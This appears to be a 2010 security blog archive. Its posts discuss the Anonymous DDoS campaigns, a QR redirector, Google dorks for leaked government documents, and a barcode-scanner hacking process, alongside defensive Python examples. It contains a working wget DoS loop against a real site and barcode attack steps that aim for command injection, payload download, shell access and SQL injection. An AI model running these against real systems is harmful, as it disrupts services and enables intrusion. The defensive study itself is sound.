My Month of Entertainment

Posted November 2nd, 2010 by

So for those of you keeping track at home:

  • Indian firm Aiplex announced that they were launching Distributed Denial-of-Service (DDoS) attacks against The Pirate Bay. (the attack)
  • The collective wisdom (Anonymous) of the Internet decided that in turn it would DDoS Aiplex, the MPAA, the RIAA, and their international counterparts in Operation Payback. (the counter-attack)
  • Somebody has DDoS’ed the sites coordinating the attacks. (the counter-counter-attack)
  • I’m popping up some popcorn to wait for the counter-counter-counter-attack and to watch the backscatter.

May we all live in interesting times, to say the least.  Some random thoughts I’m having about the DDoS campaigns:

  • If people hate you enough to show up with signs outside your office to protest, they hate you enough to flood your network.
  • Activist/vigilante/mob rule/protest has evolved to a very viable DDoS platform using a wide variety of operating systems.
  • The DDoS campaign in 2008 against the Church of Scientology was called off by activist leaders, so now we’re seeing the unbridled fury of the Intertubez unleashed.
  • On the tools side of things, I’ve seen some good development and some really creative methods to let non-technical folks participate in the DDoS.
  • Coordinating an activist army seems like the weak point in the model.


Posted in Cyberwar, Hack the Planet | 2 Comments »

Keeping Up With the DDoS Kids

Posted September 29th, 2010 by

So last week Anonymous staged a Distributed Denial of Service against the RIAA, MPAA, and Aiplex over Aiplex’s announcement that they were launching DDoS attacks of their own against torrent sites sharing copyrighted content.  In doing a bit of research on techniques that were being used, I came across this wonderful bit of script:

while true; do wget 'http://riaa.com/goldandplatinumdata.php?table=SEARCH_RESULTS&title=&artist=&label=&format=&category=&type=&awardDescription=&startMonth=1&startYear=0&endMonth=12&endYear=2009&sort=Date&sense=ASC&perPage=5000000000&go=Search' > /dev/null &  done

For those of you who don’t get it just yet, this is an awesome attack to study.  Basically what it does is run an endless loop grabbing a search page URL with parameters that will trigger a huge database query.  The beauty of the attack is that it’s “highly leveraged”: for one HTTP GET, you generate a sizeable amount of database load.  Now multiply that by thousands of yahoos out there running the same script, and it will roll over the target’s database server and possibly the application servers that query it.
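From the defending side, the leverage comes entirely from the client-supplied perPage value, so the fix is to bound it on the server and the detection is to count clients that keep asking for absurd page sizes.  The following Python is an added example, not code from the post or from the site it describes; the 200-row cap, the 25-row default, the combined-log format and the sample log lines are all assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

MAX_PER_PAGE = 200      # assumed sane upper bound for one page of search results
DEFAULT_PER_PAGE = 25   # assumed default when the client sends nothing usable
# Apache/nginx "combined" log line: client, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) ')


def page_size_requested(request_path):
    """Integer perPage value from the request's query string, or None if absent/non-numeric."""
    raw = parse_qs(urlsplit(request_path).query).get("perPage", [""])[0]
    return int(raw) if raw.isdigit() else None


def clamp_page_size(request_path):
    """Mitigation: whatever the client sent, the value handed to the database is bounded."""
    requested = page_size_requested(request_path)
    return min(requested, MAX_PER_PAGE) if requested else DEFAULT_PER_PAGE


def oversized_query_sources(log_lines, threshold=3):
    """Detection: clients that repeatedly request a page size above the cap, with their counts."""
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        client, path, _status = m.groups()
        size = page_size_requested(path)
        if size is not None and size > MAX_PER_PAGE:
            counts[client] += 1
    return {client: n for client, n in counts.items() if n >= threshold}


def log_line(client, path, nbytes):
    """Build one constructed combined-log line (fixed timestamp, status 200)."""
    return f'{client} - - [29/Sep/2010:10:00:01 +0000] "GET {path} HTTP/1.1" 200 {nbytes}'


# Constructed sample traffic (TEST-NET addresses): one client hammering the search page
# with the perPage value from the script above, one client browsing normally.
SEARCH = "/goldandplatinumdata.php?table=SEARCH_RESULTS&perPage={}&go=Search"
SAMPLE_LOG = [
    log_line("203.0.113.5", SEARCH.format(5000000000), 512),
    log_line("203.0.113.5", SEARCH.format(5000000000), 512),
    log_line("198.51.100.9", SEARCH.format(50), 8192),
    log_line("203.0.113.5", SEARCH.format(5000000000), 512),
    log_line("198.51.100.9", "/index.php", 4096),
]
```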



Posted in Hack the Planet, Technical | 1 Comment »

Because Life Isn’t Random Enough

Posted September 28th, 2010 by

In the spirit of Shockwave Rider’s information-sharing worm, the charm of StumbleUpon, and this xkcd cartoon:

Making eBay Random

And based on the fact that QR codes are “teh awesome”, I have created something wonderful, inspiring, and evil all at the same time: a Random QR Code Redirector.  Just point your phone’s QR reader app at this barcode, sit back, and enjoy the mayhem.  Sometimes you get a neat hack URL, sometimes you get a funny movie, sometimes you get information about barcodes, sometimes you get something that “once seen, cannot be unseen”.  Feel free to print them out and leave them places.  =)

And ta-da, the barcode:

QR Barcode Redirector

Readme, Clickme!!!

Get a QR reader and other QR Code info here.

“How’s it all work?”  Well, for starters I got a vanity domain at co.de (works swimmingly for software projects because, well, it’s “code”).  Then I built a database and ~15 lines of php code.  I make a weighted random select from the database and send a redirect to the browser.

Table create statement:

CREATE TABLE IF NOT EXISTS `qr_redirect_links` (
`id` smallint(3) NOT NULL auto_increment,
`url` varchar(1500) collate utf8_unicode_ci NOT NULL,
`weight` smallint(3) unsigned NOT NULL,
`comment` varchar(1500) collate utf8_unicode_ci NOT NULL,
PRIMARY KEY  (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci AUTO_INCREMENT=37 ;

The query code is as follows:

<?php
// Uses the PHP mysql_* extension, which was current when this was written (2010).
$con = mysql_connect("<hostname>", "<username>", "<password>");
if (!$con)
{
    die('Could not connect: ' . mysql_error());
}

mysql_select_db("random_urls", $con);

// You could do a bunch of random select stuff in php, but using the database's
// Rand()*(1/Weight) is the easiest 1-liner I know to get a weighted random result.
// Rows with weight 0 are excluded: 1/0 is NULL in MySQL and NULL sorts first in
// ascending order, so such a row would otherwise be picked every time.
$result = mysql_query("SELECT url FROM qr_redirect_links WHERE weight > 0 ORDER BY Rand()*(1/weight) LIMIT 1;");

while ($row = mysql_fetch_array($result))
{
    $newurl = $row['url'];
    header("Location: $newurl"); // actually send the redirect here
}

mysql_close($con);
?>

I’m also collecting interesting urls, just email/twitter/whatever to me, the only rules are that they need to not harm the browser and I have final say on what meets my stringent url quality standards.



Posted in Hack the Planet | 1 Comment »

Google Advanced Operators and Government Website Leakage

Posted August 24th, 2010 by

Ah yes, the magic of Google hacking and advanced operators.  All the “infosec cool kids” have been having a blast this week using a combination of filetype and site operators to look for classification markings in documents. I figure that with the WikiLeaks brouhaha lately, it might be a good idea to write a “howto” for government organizations to check for web leaks.

Now for the search string: "enter document marking here" site:agency.gov filetype:rtf | filetype:ppt | filetype:pptx | filetype:csv | filetype:xls | filetype:xlsx | filetype:docx | filetype:doc | filetype:pdf looks for the typical document formats on the agency.gov website that contain a specific caveat.  You could easily put in a key phrase used for marking sensitive documents in your agency.  Obviously there will be results from published organizational policy describing how to mark documents, but there will also be other things that should be looked at.

Typical document markings are easy to come by: all you have to do is pick out the key phrases from your agency policy that give the verbatim disclaimer to put on docs:

  • “This document contains sensitive security information”
  • “Disclosure is prohibited”
  • “This document contains confidential information”
  • “Not for release”
  • “No part of this document may be released”
  • “Unauthorized release may result in civil penalty or other action”
  • Any one of a thousand other key words listed on Wikipedia

Other ideas:

  • Use the “site:gov” operator to look for documents government-wide.
  • Drop the “site” operator altogether and look for agency information that has been published on the web by third parties.
  • Chain the markings together with an “or” (the | operator) for one long search string: "not for release" | "no part of this document may be released" site:gov filetype:rtf | filetype:ppt | filetype:pptx | filetype:csv | filetype:xls | filetype:xlsx | filetype:docx | filetype:doc | filetype:pdf

If you’re not doing this already, I recommend setting up a weekly or daily search for documents that have been indexed and following up on each hit as an incident.
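The same marking phrases can be checked from the inside, before Google indexes anything: walk the web root and flag every published file whose text carries one of them.  This Python is an added example, not part of the post; it assumes the directory layout and sample files it constructs, reads plain-text formats and the XML inside .docx/.xlsx/.pptx containers with the standard library only, and skips PDF (which needs an external text extractor).

```python
import os, re, tempfile, zipfile

# Marking phrases from the post; add your agency's exact policy wording here.
MARKINGS = [
    "This document contains sensitive security information",
    "Disclosure is prohibited",
    "Not for release",
    "No part of this document may be released",
]
TEXT_EXTS = {".txt", ".csv", ".rtf", ".html", ".htm"}
OOXML_EXTS = {".docx", ".xlsx", ".pptx"}  # zip containers holding the XML parts


def extract_text(path):
    """Best-effort text from one published file (PDF is skipped here)."""
    ext = os.path.splitext(path)[1].lower()
    if ext in TEXT_EXTS:
        with open(path, encoding="utf-8", errors="replace") as fh:
            return fh.read()
    if ext in OOXML_EXTS:
        with zipfile.ZipFile(path) as z:
            xml = "".join(z.read(n).decode("utf-8", "replace")
                          for n in z.namelist() if n.endswith(".xml"))
        xml = re.sub(r"</(w|a):p>", "\n", xml)  # paragraph ends become line breaks
        return re.sub(r"<[^>]+>", "", xml)      # drop tags; text split across runs rejoins
    return ""


def find_markings(root):
    """(relative path, marking) for every file under root whose text carries a marking."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            text = " ".join(extract_text(path).split()).lower()
            hits.extend((os.path.relpath(path, root), m) for m in MARKINGS if m.lower() in text)
    return sorted(hits)


def demo():
    """Constructed sample web root: a marked .docx (phrase split across runs), a marked .csv, one clean page."""
    root = tempfile.mkdtemp()
    with zipfile.ZipFile(os.path.join(root, "budget.docx"), "w") as z:
        z.writestr("word/document.xml", "<w:document><w:p><w:r><w:t>Draft budget. Not for </w:t>"
                   "</w:r><w:r><w:t>release.</w:t></w:r></w:p></w:document>")
    with open(os.path.join(root, "roster.csv"), "w") as fh:
        fh.write("name,phone\nDisclosure is prohibited,\n")
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<html><body>Public information page</body></html>")
    return find_markings(root)
```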



Posted in Hack the Planet, Technical, What Works | 2 Comments »

Cellular Phone Hacking

Posted August 5th, 2010 by

With a shout-out to Chris Paget who generated some of the biggest buzz at Defcon with his GSM hacks.



Posted in Hack the Planet, IKANHAZFIZMA | 1 Comment »

Barcode Hacking Process

Posted April 12th, 2010 by

This is something I’ve been working on in my spare brain cycles:  building a process for barcode hacking.

Limitations with barcode hacking:

  • Feedback: is hard to get and depends on the scanner and the scanner app.  In other words, you really need access to a working setup to test any kind of techniques.  This isn’t web-based SQLi where you can compare the output against other results, you have to look “inside the guts” to see if a change happened.
  • Reflections and Noise: Laser-based scanners have problems with reflection on phone screens.  This *almost* limits you to printed barcodes and reduces some of the interactivity.
  • UPC: This symbology sucks for barcode hacking because you’re limited to 12 digits, no letters are supported.

Kernels of nummieness:

  • Most modern barcode scanners are attached via USB and are recognized as a keyboard.
  • Read the previous sentence again.  =)  You know what to do here.
  • The USPS uses DataMatrix barcodes for postage.  These include command characters that “freak out” anything I read them on.  This has much potential, now if I can figure out how to harness this for the powers of mischief.
  • I have a Symbol 2D barcode reader, you can buy them on eBay for ~$120.

The process should run something like this:

  • Configuration injection: given the make and model of the scanner, turn on all available symbologies to increase the reader attack surface.  These command sets are available from the manufacturer and there is a wealth of untapped firmware vulns in them.
  • Discovery test: to determine which symbologies are supported by the barcode scanner.  The goal is to get something that supports the full ASCII set.  Code 128 (1D), PDF-417, QR, Aztec, and DataMatrix are your friends here.  For discovery, you can use “all 1’s” or something along those lines.
  • Command injection: attempt to pass OS commands to the reader application and download and install a payload onto the OS via browser, ftp, etc., or to gain a shell on the box.
  • Application escape: Attempt to escape out of the application and into the OS.  Then it’s just a simple matter of regular exploits *or* if you’re lucky, you’re already admin.  At least try a ctrl-alt-del and see what happens.
  • SQL injection: this you know, string concatenation that’s passed to the database.  The problem is that depending on the system, you might not get feedback so blind SQLi is harder.  “‘ or 1=1;–” probably won’t work because there isn’t really a login or when you’re scanning barcodes you’re already past that point.  I think the goal here should be command execution: add users, exec OS commands, and turn on additional services.
  • Malformed barcode: as a last resort, try fuzzing with non-standards-compliant barcodes to get either the scanner or the application to barf.

BTW, all the kids with their barcodes that say “‘ or 1=1;–” crack me up because they’re being barcode skiddies and don’t understand how barcodes are really used.  =)
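For the SQL injection and command injection steps above, the application behind the scanner is where the defence lives: since the scanner is just a keyboard, treat every scan as untrusted keystrokes.  The following Python is an added example, not code from the post; the symbology policy, the in-memory inventory table and the sample UPC-A codes are assumptions.  It rejects control keystrokes, checks the UPC-A check digit, and binds the value as a query parameter rather than concatenating it.

```python
import re
import sqlite3

# Keystrokes a keyboard-wedge (USB HID) scanner can deliver but real product codes never
# contain: Tab, Enter, Escape and the other C0 controls, plus DEL.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def upca_check_digit_ok(code):
    """UPC-A is exactly 12 digits; the last one is a check digit over the first eleven."""
    if not re.fullmatch(r"\d{12}", code):
        return False
    digits = [int(c) for c in code]
    total = 3 * sum(digits[0:11:2]) + sum(digits[1:11:2])   # odd positions weigh 3
    return (10 - total % 10) % 10 == digits[11]


def sanitize_scan(raw, symbology="upca"):
    """Validate one scanned value before the application acts on it; None means reject."""
    if CONTROL_CHARS.search(raw):
        return None
    if symbology == "upca":
        return raw if upca_check_digit_ok(raw) else None
    # Assumed policy for Code 128 / 2D codes: short, printable, application-defined alphabet.
    return raw if re.fullmatch(r"[A-Za-z0-9.\- ]{1,48}", raw) else None


def setup_db():
    """In-memory stand-in for the inventory database behind the scanner application."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (upc TEXT PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO items VALUES (?, ?)",
                    [("036000291452", "Coffee"), ("012345678905", "Tea")])
    return con


def lookup_safe(con, scanned):
    """Hardened lookup: drop anything that is not a well-formed code, then bind the value
    as a parameter instead of building the SQL text by string concatenation."""
    code = sanitize_scan(scanned)
    if code is None:
        return []
    return con.execute("SELECT name FROM items WHERE upc = ?", (code,)).fetchall()
```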

SQLi Test

SQL Injection Bogus Example by ME!  Only you can stop the stupidity.



Posted in Hack the Planet, Technical | 1 Comment »
